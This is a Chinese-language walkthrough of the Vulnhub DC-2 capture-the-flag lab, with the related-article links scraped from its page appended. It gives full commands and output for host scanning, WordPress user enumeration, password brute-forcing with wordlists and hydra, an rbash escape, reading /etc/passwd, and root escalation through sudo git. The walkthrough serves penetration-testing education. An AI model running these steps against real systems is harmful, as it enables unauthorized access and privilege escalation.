首先地址探测找到主机IP:

root@kali:~# nmap -sn 192.168.74.139/24

Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-10 09:47 CST

Nmap scan report for 192.168.74.1

Host is up (0.00051s latency).

MAC Address: 00:50:56:C0:00:01 (VMware)

Nmap scan report for 192.168.74.139

Host is up (0.00018s latency).

MAC Address: 00:0C:29:79:95:8B (VMware)

Nmap scan report for 192.168.74.254

Host is up (0.00012s latency).

MAC Address: 00:50:56:E0:A5:71 (VMware)

Nmap scan report for 192.168.74.137

Host is up.

Nmap done: 256 IP addresses (4 hosts up) scanned in 28.02 seconds

找到192.168.74.139,探测开放的服务:

root@kali:~# nmap -A -p1-65535 192.168.74.139

Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-10 09:54 CST

Nmap scan report for 192.168.74.139

Host is up (0.00045s latency).

Not shown: 65533 closed ports

PORT     STATE SERVICE VERSION

80/tcp   open  http    Apache httpd 2.4.10 ((Debian))

|_http-server-header: Apache/2.4.10 (Debian)

|_http-title: Did not follow redirect to http://dc-2/

|_https-redirect: ERROR: Script execution failed (use -d to debug)

7744/tcp open  ssh     OpenSSH 6.7p1 Debian 5+deb8u7 (protocol 2.0)

| ssh-hostkey:

|   1024 52:51:7b:6e:70:a4:33:7a:d2:4b:e1:0b:5a:0f:9e:d7 (DSA)

|   2048 59:11:d8:af:38:51:8f:41:a7:44:b3:28:03:80:99:42 (RSA)

|   256 df:18:1d:74:26:ce:c1:4f:6f:2f:c1:26:54:31:51:91 (ECDSA)

|_  256 d9:38:5f:99:7c:0d:64:7e:1d:46:f6:e9:7c:c6:37:17 (ED25519)

MAC Address: 00:0C:29:79:95:8B (VMware)

Device type: general purpose

Running: Linux 3.X|4.X

OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4

OS details: Linux 3.2 - 4.9

Network Distance: 1 hop

Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE

HOP RTT     ADDRESS

1   0.45 ms 192.168.74.139

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 26.02 seconds

开放了80端口的http服务和7744端口的SSH服务。
直接访问http://192.168.74.139,发现流量会被重定向到http://dc-2,所以需要修改下本地的hosts文件,增加192.168.74.139和dc-2的映射关系。
windows的在路径:C:\Windows\System32\drivers\etc 下;Linux的在路径/etc 下:

root@kali:~# cat /etc/hosts

127.0.0.1       localhost

127.0.1.1       kali

192.168.74.139  dc-2

# The following lines are desirable for IPv6 capable hosts

::1     localhost ip6-localhost ip6-loopback

ff02::1 ip6-allnodes

ff02::2 ip6-allrouters

再次访问服务器80端口,拿到第一个flag:

根据提示,使用cewl(https://www.freebuf.com/articles/network/190128.html)将该网页爬取为字典:

root@kali:/# cewl http://dc-2/ -d 10 -w /wordlist.txt

CeWL 5.4.6 (Exclusion) Robin Wood (robin@digi.ninja) (https://digi.ninja/)

然后使用username字典结合该生成的字典对登录界面进行爆破,burpsuit的attack type选择clustom bomb:

使用爆破出来的用户名和密码登录,在page界面得到flag2:

另外一种方法是通过wpscan(https://www.freebuf.com/sectool/174663.html),枚举出当前用户名信息:

root@kali:~# wpscan --url http://dc-2 -e u

_______________________________________________________________

         __          _______   _____

         \ \        / /  __ \ / ____|

          \ \  /\  / /| |__) | (___   ___  __ _ _ __

           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \

            \  /\  /  | |     ____) | (__| (_| | | | |

             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team

                         Version 3.7.5

       Sponsored by Automattic - https://automattic.com/

       @_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_

_______________________________________________________________

[+] URL: http://dc-2/

[+] Started: Sat Apr 11 15:28:25 2020

Interesting Finding(s):

[+] http://dc-2/

 | Interesting Entry: Server: Apache/2.4.10 (Debian)

 | Found By: Headers (Passive Detection)

 | Confidence: 100%

[+] http://dc-2/xmlrpc.php

 | Found By: Direct Access (Aggressive Detection)

 | Confidence: 100%

 | References:

 |  - http://codex.wordpress.org/XML-RPC_Pingback_API

 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner

 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos

 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login

 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access

[+] http://dc-2/readme.html

 | Found By: Direct Access (Aggressive Detection)

 | Confidence: 100%

[+] http://dc-2/wp-cron.php

 | Found By: Direct Access (Aggressive Detection)

 | Confidence: 60%

 | References:

 |  - https://www.iplocation.net/defend-wordpress-from-ddos

 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 4.7.10 identified (Insecure, released on 2018-04-03).

 | Found By: Rss Generator (Passive Detection)

 |  - http://dc-2/index.php/feed/, <generator>https://wordpress.org/?v=4.7.10</generator>

 |  - http://dc-2/index.php/comments/feed/, <generator>https://wordpress.org/?v=4.7.10</generator>

[+] WordPress theme in use: twentyseventeen

 | Location: http://dc-2/wp-content/themes/twentyseventeen/

 | Last Updated: 2020-03-31T00:00:00.000Z

 | Readme: http://dc-2/wp-content/themes/twentyseventeen/README.txt

 | [!] The version is out of date, the latest version is 2.3

 | Style URL: http://dc-2/wp-content/themes/twentyseventeen/style.css?ver=4.7.10

 | Style Name: Twenty Seventeen

 | Style URI: https://wordpress.org/themes/twentyseventeen/

 | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...

 | Author: the WordPress team

 | Author URI: https://wordpress.org/

 |

 | Found By: Css Style In Homepage (Passive Detection)

 |

 | Version: 1.2 (80% confidence)

 | Found By: Style (Passive Detection)

 |  - http://dc-2/wp-content/themes/twentyseventeen/style.css?ver=4.7.10, Match: 'Version: 1.2'

[+] Enumerating Users (via Passive and Aggressive Methods)

 Brute Forcing Author IDs - Time: 00:00:00 <=============================================================================================================================================================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] admin

 | Found By: Rss Generator (Passive Detection)

 | Confirmed By:

 |  Wp Json Api (Aggressive Detection)

 |   - http://dc-2/index.php/wp-json/wp/v2/users/?per_page=100&page=1

 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)

 |  Login Error Messages (Aggressive Detection)

[+] jerry

 | Found By: Wp Json Api (Aggressive Detection)

 |  - http://dc-2/index.php/wp-json/wp/v2/users/?per_page=100&page=1

 | Confirmed By:

 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)

 |  Login Error Messages (Aggressive Detection)

[+] tom

 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)

 | Confirmed By: Login Error Messages (Aggressive Detection)

[!] No WPVulnDB API Token given, as a result vulnerability data has not been output.

[!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up.

[+] Finished: Sat Apr 11 15:28:30 2020

[+] Requests Done: 55

[+] Cached Requests: 6

[+] Data Sent: 11.562 KB

[+] Data Received: 514.096 KB

[+] Memory used: 110.116 MB

[+] Elapsed time: 00:00:04

从中可见有三个用户名:admin、jerry、tom

使用wpscan自带的密码破解模块,结合cewl生成的字典文件对密码进行破解,可以得到jerry和tom的密码:

root@kali:~# wpscan --url http://dc-2 -U jerry -P /wordlist.txt

……

[+] Performing password attack on Xmlrpc against 1 user/s

Trying jerry / adipiscing Time: 00:00:16 <=============================================================================================================================================================> (200 / 200) 100.00% Time: 00:00:16

[SUCCESS] - jerry / adipiscing                                                                                                                                                                                                             

[i] Valid Combinations Found:

 | Username: jerry, Password: adipiscing

root@kali:~# wpscan --url http://dc-2 -U tom -P /wordlist.txt

……

[+] Performing password attack on Xmlrpc against 1 user/s

[SUCCESS] - tom / parturient

Trying tom / nascetur Time: 00:00:17 <=================================================================================================================================================================> (210 / 210) 100.00% Time: 00:00:17

[i] Valid Combinations Found:

 | Username: tom, Password: parturient

用hydra基于之前的用户名和密码尝试爆破一下7744:

root@kali:~# hydra -l tom -P /wordlist.txt -t 4  -s 7744 ssh://192.168.74.139

Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-04-11 16:43:49

[DATA] max 4 tasks per 1 server, overall 4 tasks, 238 login tries (l:1/p:238), ~60 tries per task

[DATA] attacking ssh://192.168.74.139:7744/

[STATUS] 24.00 tries/min, 24 tries in 00:01h, 214 to do in 00:09h, 4 active

[STATUS] 28.00 tries/min, 84 tries in 00:03h, 154 to do in 00:06h, 4 active

[STATUS] 23.43 tries/min, 164 tries in 00:07h, 74 to do in 00:04h, 4 active

[STATUS] 23.00 tries/min, 184 tries in 00:08h, 54 to do in 00:03h, 4 active

[7744][ssh] host: 192.168.74.139   login: tom   password: parturient

1 of 1 target successfully completed, 1 valid password found

Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-04-11 16:52:55

登录后得到第三个flag:

tom@DC-2:~$ ls

flag3.txt  usr

tom@DC-2:~$ vi flag3.txt

Poor old Tom is always running after Jerry. Perhaps he should su for all the stress he causes.

由于shell设置了rbash(https://www.freebuf.com/articles/system/188989.html),导致大部分命令受限执行,测试vi可以使用,通vi一个文件设置shell尝试绕过rbash:

tom@DC-2:~$ vi test

通过:set shell=/bin/sh

然后调用执行:shell

$ whoami

/bin/sh: 1: whoami: not found

$ export -p

export HOME='/home/tom'

export LANG='en_US.UTF-8'

export LOGNAME='tom'

export MAIL='/var/mail/tom'

export PATH='/home/tom/usr/bin'

export PWD='/home/tom'

export SHELL='/bin/rbash'

export SHLVL='1'

export SSH_CLIENT='192.168.74.137 36850 7744'

export SSH_CONNECTION='192.168.74.137 36850 192.168.74.139 7744'

export SSH_TTY='/dev/pts/0'

export TERM='xterm-256color'

export USER='tom'

export VIM='/usr/share/vim'

export VIMRUNTIME='/usr/share/vim/vim74'

export _='whoami'

尝试修改PATH,执行:

$ export PATH="/usr/sbin:/usr/bin:/rbin:/bin"
$ export PATH="/usr/sbin:/usr/bin:/rbin:/bin"

$ export -p

export HOME='/home/tom'

export LANG='en_US.UTF-8'

export LOGNAME='tom'

export MAIL='/var/mail/tom'

export PATH='/usr/sbin:/usr/bin:/rbin:/bin'

export PWD='/home/tom'

export SHELL='/bin/rbash'

export SHLVL='1'

export SSH_CLIENT='192.168.74.137 36850 7744'

export SSH_CONNECTION='192.168.74.137 36850 192.168.74.139 7744'

export SSH_TTY='/dev/pts/0'

export TERM='xterm-256color'

export USER='tom'

export VIM='/usr/share/vim'

export VIMRUNTIME='/usr/share/vim/vim74'

export _='PATH=/usr/sbin:/usr/bin:/rbin:/bin'

$

此时执行各种命令就正常了:

$ whoami

tom

$ cat flag3.txt

Poor old Tom is always running after Jerry. Perhaps he should su for all the stress he causes.

$

查看passwd文件,看到jerry用户:

$ cat /etc/passwd

root:x:0:0:root:/root:/bin/bash

daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin

bin:x:2:2:bin:/bin:/usr/sbin/nologin

sys:x:3:3:sys:/dev:/usr/sbin/nologin

sync:x:4:65534:sync:/bin:/bin/sync

games:x:5:60:games:/usr/games:/usr/sbin/nologin

man:x:6:12:man:/var/cache/man:/usr/sbin/nologin

lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin

mail:x:8:8:mail:/var/mail:/usr/sbin/nologin

news:x:9:9:news:/var/spool/news:/usr/sbin/nologin

uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin

proxy:x:13:13:proxy:/bin:/usr/sbin/nologin

www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin

backup:x:34:34:backup:/var/backups:/usr/sbin/nologin

list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin

irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin

gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin

nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin

systemd-timesync:x:100:103:systemd Time Synchronization,,,:/run/systemd:/bin/false

systemd-network:x:101:104:systemd Network Management,,,:/run/systemd/netif:/bin/false

systemd-resolve:x:102:105:systemd Resolver,,,:/run/systemd/resolve:/bin/false

systemd-bus-proxy:x:103:106:systemd Bus Proxy,,,:/run/systemd:/bin/false

Debian-exim:x:104:109::/var/spool/exim4:/bin/false

messagebus:x:105:110::/var/run/dbus:/bin/false

statd:x:106:65534::/var/lib/nfs:/bin/false

sshd:x:107:65534::/var/run/sshd:/usr/sbin/nologin

mysql:x:108:114:MySQL Server,,,:/nonexistent:/bin/false

tom:x:1001:1001:Tom Cat,,,:/home/tom:/bin/rbash

jerry:x:1002:1002:Jerry Mouse,,,:/home/jerry:/bin/bash

$

尝试使用之前的密码切换到jerry,拿到第四个flag:

$ su jerry

Password:

jerry@DC-2:/home/tom$ cd /home/jerry

jerry@DC-2:~$ ls

flag4.txt

jerry@DC-2:~$ cat flag4.txt

Good to see that you've made it this far - but you're not home yet. 

You still need to get the final flag (the only flag that really counts!!!).  

No hints here - you're on your own now.  :-)

Go on - git outta here!!!!

jerry@DC-2:~$

根据提示使用git提权:

jerry@DC-2:~$ sudo git -p help

usage: git [--version] [--help] [-C <path>] [-c name=value]

           [--exec-path[=<path>]] [--html-path] [--man-path] [--info-path]

           [-p|--paginate|--no-pager] [--no-replace-objects] [--bare]

           [--git-dir=<path>] [--work-tree=<path>] [--namespace=<name>]

           <command> [<args>]

The most commonly used git commands are:

   add        Add file contents to the index

   bisect     Find by binary search the change that introduced a bug

   branch     List, create, or delete branches

   checkout   Checkout a branch or paths to the working tree

   clone      Clone a repository into a new directory

   commit     Record changes to the repository

   diff       Show changes between commits, commit and working tree, etc

   fetch      Download objects and refs from another repository

   grep       Print lines matching a pattern

   init       Create an empty Git repository or reinitialize an existing one

   log        Show commit logs

   merge      Join two or more development histories together

   mv         Move or rename a file, a directory, or a symlink

   pull       Fetch from and integrate with another repository or a local branch

   push       Update remote refs along with associated objects

!/bin/sh

# whoami

root

#

# ls /root

final-flag.txt

#

总结:

1、nmap扫描对应的网段,确定主机IP和开放端口及其服务

2、基于1的结果使用wpscan做进一步探测(https://www.freebuf.com/sectool/174663.html)

3、对rbash进行绕过(https://www.freebuf.com/articles/system/188989.html)

4、使用git进行提权(https://www.cnblogs.com/zaqzzz/p/12075132.html

vulnhub: DC 2的更多相关文章

  1. vulnhub DC:1渗透笔记

    DC:1渗透笔记 靶机下载地址:https://www.vulnhub.com/entry/dc-1,292/ kali ip地址 信息收集 首先扫描一下靶机ip地址 nmap -sP 192.168 ...

  2. DC靶机1-9合集

    DC1 文章前提概述 本文介绍DC-1靶机的渗透测试流程 涉及知识点(比较基础): nmap扫描网段端口服务 msf的漏洞搜索 drupal7的命令执行利用 netcat反向shell mysql的基 ...

  3. Dc:7 Vulnhub Walkthrough

    靶机下载地址: https://www.vulnhub.com/entry/dc-7,356/ 主机扫描: http://10.10.202.161/ Google搜索下: SSH 登录 以上分析得出 ...

  4. vulnhub: DC 9

    信息收集: root@kali:/opt/test# nmap -A -v 192.168.76.137 Starting Nmap 7.80 ( https://nmap.org ) at 2020 ...

  5. 【vulnhub】靶机-【DC系列】DC9(附靶机)

    出品|MS08067实验室(www.ms08067.com) 本文作者:大方子(Ms08067实验室核心成员) 主机信息 Kali:192.168.56.113 DC9:192.168.56.112 ...

  6. vulnhub: DC 3

    通过nmap扫描,只开放了80端口,并且该web服务是基于Joomla搭建: root@kali:~# nmap -A 192.168.74.140 Starting Nmap 7.80 ( http ...

  7. vulnhub: DC 4

    信息收集: yurang@kali:~$ nmap -sn 192.168.76.1/24 Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-04 ...

  8. Vulnhub Breach1.0

    1.靶机信息 下载链接 https://download.vulnhub.com/breach/Breach-1.0.zip 靶机说明 Breach1.0是一个难度为初级到中级的BooT2Root/C ...

  9. Nezuko: 1 Vulnhub Walkthrough

    下载地址: https://www.vulnhub.com/entry/nezuko-1,352/ 虚拟机启动,设置IP地址DHCP获取 主机发现扫描: 主机层面扫描: ╰─ nmap -p1-655 ...

随机推荐

  1. Vue 学习第二部

    目录 通过axios实现数据请求 json json数据的语法 js中是提供的接送数据转换方法 ajax 数据接口 ajax的使用 同源策略 ajax跨域(跨源)方案之cors 组件化开发 组件[co ...

  2. OpenCV开发笔记(七十三):红胖子8分钟带你使用opencv+dnn+yolov3识别物体

      前言   级联分类器的效果并不是很好,准确度相对深度学习较低,上一章节使用了dnn中的tensorflow,本章使用yolov3模型,识别出具体的分类.   Demo   320x320,置信度0 ...

  3. 支持向量机(SVM)必备概念(凸集和凸函数,凸优化问题,软间隔,核函数,拉格朗日乘子法,对偶问题,slater条件、KKT条件)

    SVM目前被认为是最好的现成的分类器,SVM整个原理的推导过程也很是复杂啊,其中涉及到很多概念,如:凸集和凸函数,凸优化问题,软间隔,核函数,拉格朗日乘子法,对偶问题,slater条件.KKT条件还有 ...

  4. Spring Boot 加载application.properties顺序

    1.准备四份application.properties a.项目根目录下config/application.properties ,内容为:  test.user.name = a b.项目根目录 ...

  5. 【转】Setting up SDL 2 on Code::Blocks 12.11

    FROM: http://lazyfoo.net/tutorials/SDL/01_hello_SDL/windows/codeblocks/index.php Setting up SDL 2 on ...

  6. CodeForces 1408I Bitwise Magic

    题意 给定三个整数 \(n,k,c\) 和一个长度为 \(n\) 的序列 \(a\),保证 \(a_i\) 互不相同.可以操作 \(k\) 次,每次随机选择一个 \(a_i\) 变成 \(a_i-1\ ...

  7. Java学习的第二十三天

    1.今天学习了用log4j记录日志 综合实例 2.不知道日志什么时候用到 3.明天学习12章

  8. 【Android Studio】安卓开发初体验3.1——UI设计之常用控件

    常用控件 首先对xml文件的编辑有三种模式 Code为纯代码 Split是一边代码,一边预览效果图 Designer就是有UI设计界面 TextView 用于在界面上显示一段文本信息 所有控件都可以在 ...

  9. Python正则表达式-换行的匹配

    找到了之前参考的博文,用来记录一下https://www.cnblogs.com/baxianhua/p/8572805.html 平常 点 (.)去匹配任意字符的时候,是不能匹配换行符的 匹配换行: ...

  10. CSS3之transition属性

    transition属性可直译为"过渡",主要用于检索或设置对象变换的过渡. 语法: transition:property duration [timing-function] ...